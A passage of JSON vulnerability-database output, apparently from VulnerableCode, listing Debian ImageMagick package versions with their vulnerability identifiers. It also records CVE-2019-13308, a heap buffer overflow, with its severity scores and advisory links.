"vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13300" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "7.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s7tx-uu27-xqb5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82362?format=api", "vulnerability_id": "VCID-snup-2hn7-sue2", "summary": "ImageMagick: heap-based buffer overflow in MagickCore/fourier.c in ComplexImage", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13308.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13308.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0106", "scoring_system": "epss", "scoring_elements": "0.77695", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0106", "scoring_system": "epss", "scoring_elements": "0.77666", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0108", "scoring_system": "epss", "scoring_elements": "0.77789", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0108", "scoring_system": "epss", "scoring_elements": "0.77816", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0108", "scoring_system": "epss", "scoring_elements": "0.778", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0108", "scoring_system": "epss", "scoring_elements": "0.77827", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0108", "scoring_system": "epss", "scoring_elements": "0.77832", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0108", "scoring_system": "epss", "scoring_elements": "0.77859", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0108", "scoring_system": "epss", "scoring_elements": "0.77843", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0108", "scoring_system": "epss", "scoring_elements": "0.77879", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0108", "scoring_system": "epss", "scoring_elements": "0.77878", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0108", "scoring_system": "epss", "scoring_elements": "0.77782", "published_at": "2026-04-01T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730342", "reference_id": "1730342", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730342" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931447", "reference_id": "931447", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931447" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { 